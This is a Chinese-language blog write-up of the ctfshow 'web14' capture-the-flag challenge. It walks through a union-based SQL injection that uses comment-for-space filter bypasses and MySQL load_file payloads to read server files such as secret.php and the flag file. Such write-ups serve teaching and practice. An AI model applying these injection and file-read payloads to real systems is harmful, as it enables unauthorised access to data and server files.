ctfshow web14

最新推荐文章于 2024-06-06 13:36:15 发布
最新推荐文章于 2024-06-06 13:36:15 发布
阅读量1k 收藏 3
点赞数 2
分类专栏: CTF 文章标签: 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55923820/article/details/118783171
版权 
题目描述:无

解题思路

这道题比较简单,分值也只有5分,就是一个简单的sql注入。但是这个sql注入的回显你得看它的源代码里才有。但是它把你右击查看源码那个玩意儿给禁了。你需要在你的url前面加view-source:才能看到源码

解题过程,首先打开题目,它的传参是c,值有1,有2,有3,有44444,也有3333。我一个一个试着传了一下。
在这里插入图片描述

传了一个?c=3的时候,弹出下图。有敏感字符呀,我还以为一访问就出来flag了,没想到

在这里插入图片描述

出来个这页面,这种页面基本可以判断它就是个sql注入

在这里插入图片描述

我们直接点确定,查询一下1这个值,url这样

在这里插入图片描述

我们在看一下这条语句能弹出啥,结果发现啥也没

-1 select version()

在这里插入图片描述

它好像做过滤了,我用字符绕了一下,成功弹出version值

-1/**/union/**/select/**/version()

在这里插入图片描述
在这里插入图片描述

这种题我们直接读一下,它当前这个网页文件here_1s_your_f1ag.php可能就能出来flag,我们用函数load_file读一下

-1/**/union/**/select/**/load_file('/var/www/html/here_1s_your_f1ag.php')
-1/**/union/**/select/**/load_file('/var/www/html/index.php')   也没有东西

这儿还有一个secret.php,我们读一读

-1/**/union/**/select/**/load_file('/var/www/html/secret.php')

在这里插入图片描述

读出一个real_flag_is_here,我们读取一下

-1/**/union/**/select/**/load_file('/real_flag_is_here')

在这里插入图片描述

拿到flag(注意每次sql注入完,查看注入结果是需要在url前加view-source: )
在这里插入图片描述

CaIDa0
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctf.show_web(1-14)wp
qq_73767109的博客
03-28 530
ctf.show_web(1-14) 详细解题思路及部分脚本
CTF show WEB14
羽的博客
02-18 2770
题目地址:https://ctf.show 对于这个题第一个坑要过的话必须得了解php的switch case语句。 在这里举个例子: $number=1; switch ($number) { case "1": echo "one"; case "2": echo "two"; case "3" echo "three"...
ctfshow web web签到--web14
最新发布
2301_81040377的博客
06-06 512
要让回显有用的东西我们不可能回显几万,靶机都没了,所有挨着试。我想手注的,但是不知道为什么没有回显了只能sqlmap了。本来是想直接命令执行的,发现过滤了就用这个来看目录。SQL注入,我之前是没遇到这种格式的长了新姿势。php伪协议,不知道flag文件所以不能用。可以手注空格绕过,但是我的还是没有回显。显然我们不能用正常的SQL注入了。v1必须为字母v2必须为数字。查看源码原来我们的木马太长了。那么我们就需要用特殊的密码。刚好闭合,管理员身份就过了。我们并不知道密码,这里用。访问F12获得查询语句。
ctfshow-萌新-web14( 曲线救国-POST请求绕过获取网站敏感信息)_ctfweb14萌新
2301_82101171的博客
04-17 268
2.由于手动将GET请求改成了POST请求, 需要再手动添加 Content-Type: application/x-www-form-urlencoded , 否则将无法正常发送POST请求的参数。而后使用代理工具( Burp Suite)抓包, 在POST请求中传递需要执行的系统命令, 这里需要注意两个地方( 如果使用的是其他工具可以忽略)>来代替分号, 但这样一来就只能执行一行代码, 增加了解题的难度。3.源码中的过滤只针对GET请求的参数, 并未对POST请求的参数做限制, 可以利用这一点搞事情。
ctfshow-WEB-web14( 利用数据库读写功能读取网站敏感文件)
热门推荐
wangyuxiang946的博客
09-07 1万+
ctf.show WEB模块第14关是一个SQL注入漏洞, 绕过switch循环后可以拿到一个登录界面, 登录界面存在SQL注入, 脱库以后会提示flag在另一个文件中, 利用数据库的文件读写功能读取文件内容即可拿到flag 开局是一个switch循环, 需要传递参数 c, 参数对应的执行结果有四种: '$url', '@A@', $url, "$url" ; 前两个是字符串, 没啥用, 作者的目的应该是想让我们输出后两个 $url 的其中一个, 但输出之前还有个sleep(), 选的不合适..
[ctfshow]入门2
qq_61109509的博客
01-20 2047
web14(默认配置) web15(社会工程学) web16(探针泄露) 什么是雅黑探针,以及雅黑探针的使用方法 web17(真实ip) wed18(js小游戏) web19(数据库泄露) 解法一hackbar 注意是Post, , 解法二:抓包 抓包后发现pazzword里的密码和原先不一样,应该是加密所致,改成原先密码出flag 解法三:ASC加密 AES解密网址 对AES理解:注意是AES/CBC/... 源代码里出现了密钥和偏移量 web20 mdb文件是早期..
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow 做题 web模块 web11~web14
Goodric的博客
07-23 1692
打开环境,可输入密码登录。 并且给出了源码, 过滤了这些字符: > $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; 满足这个条件时,输出 flag :
ctfshow web 1-14
yzl_007的博客
09-30 816
web1-20 web1-20web1web2web3web4web5月饼杯web签到持续更新。。。。。 web1 签到题,打开查看源码,base64解码得到flag web2 题目提示:最简单的sql sqlmap一把嗦 详细的使用可以查看这个:https://blog.csdn.net/yzl_007/article/details/119974367 web3 打开是一段代码, <?php include($_GET['url']);?> 文件包含函数,容易造成文件包含漏洞,输入
ctfweb入门(13-14
qq_62046696的博客
06-16 711
进入题目是个文件上传的题目,尝试了一番文件上传漏洞利用的方法后,没有啥突破,可能有啥隐藏的目录,尝试源码泄露利用的方法,在输入upload.php.bak时成功下载下来源码。 .bak文件是备份文件。 这里列举一下常见的源码泄露 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏,还有以.phps .bak结尾的网页 在web题没有头绪的时候可以尝试可能会有奇效。 源码如下: 文件的大小要小于等于24,名字长度小于等于9,后缀长度小于等于3,并且最要命的是后缀和名字都不能包含php。我们肯定是
CTFshow web入门——爆破
小元砸的博客
01-24 4668
web 21 一.涉及工具: burp suit burp suit 使用教程 二.解题思路: 1.随便输一个密码和用户名抓包一下 2.base64解密一下发现账号密码的形式为 账号:密码,根据题目提示我们用自定义迭代器爆破,使用方法参考:Custom iterator的使用 注:下面爆破用的字典是题目所提供的 3.爆破出结果 web 22 一.涉及知识点: 子域名爆破(此题不能爆破出来)在线子域名爆破 二.解题思路: 直接点开View Hint(提示)即可得到答案 web 23 一.涉及工具: p
刷题之旅第34站,CTFshow web14
cc菜的一批
02-17 2288
感谢ctf show平台提供题目 提交命令,得到了php文件。 ?c=3 我们打开这个php文件看看,是个查询界面。 通过测试,我们发现 information_schema.columns,information_schema.tables均被过滤了,那么可能flag并不是在数据库中。 我们使用sql 的 load_file 命令,进行读文件。在前面我们看到了有个secret.php文件。...
ctfshow web 14 sql注入
m0_46412682的博客
07-16 412
ctfshow web 14 sql注入 开始的页面是一段代码: 这是get传参,/?c=1 sleep一秒后输出$url /?c=2也会输出@A@,有5555 4444 333但是不可能等这么久,直接输 /?c=3,出现 @A@here_1s_your_f1ag.php@A@ 那打开这个文件,这是一个查询的页面 输入1回显是admin,url中可能存在sql注入 按F12查看源代码过滤了/information_schema.tables|information_schema.colum
CTF-show WEB入门--web14
m0_73912575的博客
01-04 606
CTF-show WEB入门--web14
CTFshow-Web入门-Web1-20 (信息收集完结篇)
m0_61155226的博客
03-07 7696
CTFshow-Web入门-Web11-20 (信息收集完结篇)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值